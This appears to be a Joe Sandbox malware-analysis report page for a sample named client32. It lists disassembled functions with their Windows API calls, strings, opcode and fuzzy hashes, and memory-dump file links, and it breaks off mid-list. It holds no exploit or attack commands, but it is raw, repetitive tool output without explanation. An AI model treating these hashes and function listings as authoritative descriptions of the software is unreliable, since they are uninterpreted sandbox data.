Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf
String ID: Local\$already created$already opened$name too long
API String ID: 2111968516-487411162
Opcode ID: 8c632f3ec444d61c620310c3f220f804106f6ae6d111c9f82141b29fd930005b
Instruction ID: cb5f1cc2a17576f821aa9b05a4cc3a01fd4672274360e4622ba8156ef976e5a2
Opcode Fuzzy Hash: 8c632f3ec444d61c620310c3f220f804106f6ae6d111c9f82141b29fd930005b
Instruction Fuzzy Hash: BC412A35B4018E8BD711DF749960BAEFBE4BB65308F1441E9D84E8B341DB729848D750

Function 11071A10 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 113windowtimeCOMMON

Download Yara Rule

APIs

Part of subcall function 11110DE0: GetCurrentThreadId.KERNEL32 ref: 11110E76
Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
Part of subcall function 11110DE0: InitializeCriticalSection.KERNEL32(111F18F0,?,11031700,00000001,00000000), ref: 11110E98
Part of subcall function 11110DE0: EnterCriticalSection.KERNEL32(111F18F0,?,11031700), ref: 11110EAC
Part of subcall function 11110DE0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2

Part of subcall function 110717D0: EnterCriticalSection.KERNEL32(?,B6DE5DE1,75BF7CB0,75BF7AA0,?,75BF7CB0,75BF7AA0), ref: 11071824
Part of subcall function 110717D0: LeaveCriticalSection.KERNEL32(?), ref: 11071838

Part of subcall function 110717D0: LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110719B1

Part of subcall function 111100D0: SetEvent.KERNEL32(00000000), ref: 111100F4

SetTimer.USER32(00000000,00000000,000000FA,00000000), ref: 11071A99
GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 11071AA9
DispatchMessageA.USER32(?), ref: 11071AB7

Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,74DF23A0,1100BF7B), ref: 11110928
Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935

GetMessageA.USER32(00000000,00000000,00000000,00000000), ref: 11071AF2

Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010,?), ref: 11110970

Strings

Receive, xrefs: 11071A38
uj, xrefs: 11071AE6

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$EnterMessage$EventInitialize$CreateCurrentDispatchThreadTimer
String ID: Receive$uj
API String ID: 450530131-2059908200
Opcode ID: 306ac350a6f3da106708b230fd3fe14cd16cd220b62ed64858813fe05518f217
Instruction ID: 0a9c807037b146f40df411c6e2c35c0f30c5bd1f590cfaf88bb5acf613226059
Opcode Fuzzy Hash: 306ac350a6f3da106708b230fd3fe14cd16cd220b62ed64858813fe05518f217
Instruction Fuzzy Hash: 3F31B375F4021A6AEB14DBA1CC51FBEF3A9EF44B14F004528F611AA5C0EBB4B904C7A4

Function 110935A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON

Download Yara Rule

APIs

Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8

Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2

GetWindowLongA.USER32(?,000000EC), ref: 110935E9
SetWindowLongA.USER32(?,000000EC,00000000), ref: 11093617

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

GetWindowLongA.USER32(?,000000F0), ref: 11093640
SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109366E

Strings

m_hWnd, xrefs: 110935D6, 11093603, 1109362D, 1109365A
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110935D1, 110935FE, 11093628, 11093655

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LongWindow$ErrorLastwsprintf$CreateDialogExitMessageParamProcessVersion_memset
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 3136964118-2830328467
Opcode ID: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
Instruction ID: a6255a4dd11f96cfd194679b8cc3cdd2b3575d4c8ce1213ed658c40333833496
Opcode Fuzzy Hash: 990935dc77e2aa569bf3059a9d0286cde9b91335195f1cd60f9fd39a0179e0c2
Instruction Fuzzy Hash: 1431E4B5A04615ABCB14DF65DC81F9BB3E5AB8C318F10862DF56A973D0DB34B840CB98

Function 11039D40 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 11039D75
GetClassNameA.USER32(00000000,?,00000040), ref: 11039D9B

Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207

GetWindowRect.USER32(00000000,?), ref: 11039E28
MapWindowPoints.USER32(00000000,?,?,00000002), ref: 11039E4B
SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,?), ref: 11039E64

Strings

edit, xrefs: 11039DA4

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$ClassItemNamePointsRect_malloc_memsetwsprintf
String ID: edit
API String ID: 2434965487-2167791130
Opcode ID: 1a6e82895b157ee75175be2a783bdbb1543eeff98655f5648e3dd0b0a76aec2c
Instruction ID: f9e6bd4c33793f11b50bf25b06f178ae96fa7521bfbcabfc1f80b034bb5a9250
Opcode Fuzzy Hash: 1a6e82895b157ee75175be2a783bdbb1543eeff98655f5648e3dd0b0a76aec2c
Instruction Fuzzy Hash: DD418F75A00609AFD714CFA4CD84FAEF7B9FB88718F108519E9669B384EB74A904CB50

Function 1100FA80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 1100FA96

Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 111612FB
Part of subcall function 111612E6: __CxxThrowException@8.LIBCMT ref: 11161310
Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 11161321

std::_Xinvalid_argument.LIBCPMT ref: 1100FAAC
std::_Xinvalid_argument.LIBCPMT ref: 1100FAC7
_memmove.LIBCMT ref: 1100FB32

Strings

invalid string position, xrefs: 1100FA91
string too long, xrefs: 1100FAA7, 1100FAC2

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: 4f49109316a020841427eee718ddadd96360e0229a1e8a26fb5bce8f364a2a78
Instruction ID: b7a704e07af9f59b67595250bdb2b2c868a89ac118faf690a021eb1c275bf4cb
Opcode Fuzzy Hash: 4f49109316a020841427eee718ddadd96360e0229a1e8a26fb5bce8f364a2a78
Instruction Fuzzy Hash: E731D972B046059BF711CE5DEC90E9EF7E9EFC16A4B104A2EE451CB280CB71AC4097A1

Function 110ED7B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,?), ref: 110ED801
_free.LIBCMT ref: 110ED81C

Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ABB
Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

_malloc.LIBCMT ref: 110ED82E
RegQueryValueExA.ADVAPI32(000007FF,?,00000000,?,00000000,000007FF), ref: 110ED85A
_free.LIBCMT ref: 110ED8E3

Strings

Error %d getting %s, xrefs: 110ED89D

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: QueryValue_free$ErrorFreeHeapLast_malloc
String ID: Error %d getting %s
API String ID: 582965682-2709163689
Opcode ID: 59ae116487e404f5de4155705fcd48daf632d85a688279f19c106630c28adf20
Instruction ID: 02eced05e3356085969bcbe05084d5abf0c2b7b1903d0388d20c61e7be7eac91
Opcode Fuzzy Hash: 59ae116487e404f5de4155705fcd48daf632d85a688279f19c106630c28adf20
Instruction Fuzzy Hash: F1318375D001289BDB60DA59CD84BEEB7F9EF54314F0481E9E88DA7240DE706E89CBD1

Function 1100F990 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 1100F9A9

Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 111612FB
Part of subcall function 111612E6: __CxxThrowException@8.LIBCMT ref: 11161310
Part of subcall function 111612E6: std::exception::exception.LIBCMT ref: 11161321

std::_Xinvalid_argument.LIBCPMT ref: 1100F9CA
std::_Xinvalid_argument.LIBCPMT ref: 1100F9E5
_memmove.LIBCMT ref: 1100FA4D

Strings

invalid string position, xrefs: 1100F9A4
string too long, xrefs: 1100F9C5, 1100F9E0

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_$std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 443534600-4289949731
Opcode ID: 65343fa5adcae717427247030e2bc263d0e2c2c33e6d52194a4164a92b342909
Instruction ID: dd7b0a9210ae89047594a984bf0db1b74830ff0f253f3c884b4c9459fb9d7564
Opcode Fuzzy Hash: 65343fa5adcae717427247030e2bc263d0e2c2c33e6d52194a4164a92b342909
Instruction Fuzzy Hash: 1031FE72B04205CFE715CE5DE880A5AF7D9EF957A4B10062FE551CB240D771EC80D792

Function 1103D0E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80synchronizationwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 111100D0: SetEvent.KERNEL32(00000000), ref: 111100F4

Part of subcall function 11110920: EnterCriticalSection.KERNEL32(00000010,00000000,74DF23A0,1100BF7B), ref: 11110928
Part of subcall function 11110920: LeaveCriticalSection.KERNEL32(00000010), ref: 11110935

WaitForSingleObject.KERNEL32(?,00001388), ref: 1103D13A
SetPriorityClass.KERNEL32(?,?), ref: 1103D167
IsWindow.USER32(?), ref: 1103D17E
SendMessageA.USER32(?,0000004A,00000000,00000492), ref: 1103D1B8
_free.LIBCMT ref: 1103D1BF

Strings

Show16, xrefs: 1103D0E9

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$ClassEnterEventLeaveMessageObjectPrioritySendSingleWaitWindow_free
String ID: Show16
API String ID: 625148989-2844191965
Opcode ID: 47433e7779c894db8022aff61e231e604fd5c81728f26033d6783e29d0fba9b0
Instruction ID: 63bdf3f47677d5a3c66ccb25ed14d3d2c42581b640399fe0720dd9fbd5d3b219
Opcode Fuzzy Hash: 47433e7779c894db8022aff61e231e604fd5c81728f26033d6783e29d0fba9b0
Instruction Fuzzy Hash: 3B3182B5E10346AFD715DFA4C8849AFF7F9BB84309F40496DE56A97244DB70BA00CB81

Function 1109DA70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78sleepCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 1109DA8F
GetClassNameA.USER32(?,?,00000040), ref: 1109DAA0
FindWindowA.USER32(?,00000000), ref: 1109DAE1
Sleep.KERNEL32(?,?,?,?,?,?,?,?,?,1109ED09,000001F4,00000006,?,11067720,0000048C,00000001), ref: 1109DAFC
FindWindowA.USER32(?,00000000), ref: 1109DB0D

Strings

gfff, xrefs: 1109DABA

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Find$ClassNameSleep
String ID: gfff
API String ID: 1867012073-1553575800
Opcode ID: 1ecd8b7e6547104b0f4110197084cc4d233d394bce1ee77329b8f77fd1a9e4dc
Instruction ID: 890a18fbc74fe270e4342627711d03cf76ac86643ef01556bf82bf996dd7b4ac
Opcode Fuzzy Hash: 1ecd8b7e6547104b0f4110197084cc4d233d394bce1ee77329b8f77fd1a9e4dc
Instruction Fuzzy Hash: 9F212372E4121D9BC700CEA8CD94AAEBBA9FF44714B060169EC15EB700DB74E812DBA0

Function 11009620 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 77fileCOMMON

Download Yara Rule

APIs

Part of subcall function 110D1540: wvsprintfA.USER32(?,?,00000000), ref: 110D1572

WriteFile.KERNEL32(00000000,?,?,00000000,00000000), ref: 110096D6
WriteFile.KERNEL32(?,<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >,000000B9,00000000,00000000), ref: 110096EB

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

<HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">, xrefs: 11009659
IsA(), xrefs: 1100968D, 110096B5
<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >, xrefs: 110096E5
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11009688, 110096B0

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110215170.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110243524.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110274238.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: FileWrite$ErrorExitLastMessageProcesswsprintfwvsprintf
String ID: <HTML%s><Body><title>Approved URLs</title><body bgcolor="#FFFFFF"><div align="center"> <center><table > <td><div align="center"> <center><table border="1" cellspacing="0" cellpadding="3" bgcolor="#FFFFFF" bordercolor="#6089B7">$<tr><td ><div align="center"><img src="URL_list.gif" height="78"><br></div> </td></tr><tr><td > <div align="left"> <table border="0" cellpadding="0" height="23" >$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 863766397-389219706
Opcode ID: 6cba4906e97f348ea097e0d93425011368abffb83af317fd01dd9cb46dfc5e94
Instruction ID: c29ccd5437a1998bdc0500c50b26c338a4961a37ea6a19b2fc580a4c00e0eec9
Opcode Fuzzy Hash: 6cba4906e97f348ea097e0d93425011368abffb83af317fd01dd9cb46dfc5e94
Instruction Fuzzy Hash: 5A215E75A00219ABDB00DFD5DC41FEEF3B8FF59654F10025AE922B7280EB746504CBA1

Function 11063AF0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72COMMON

Download Yara Rule

APIs

GetWindowPlacement.USER32(?,0000002C,?,75BF7AA0,00000000), ref: 11063B3D
wsprintfA.USER32 ref: 11063B79

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

Strings

m_hWnd, xrefs: 11063B28
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11063B23
%d %d %d %d %d %d %d %d %d, xrefs: 11063B73
,, xrefs: 11063B15

Memory Dump Source

Source File: 00000004.00000002.3109887545.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.3109858320.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.3110114651.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
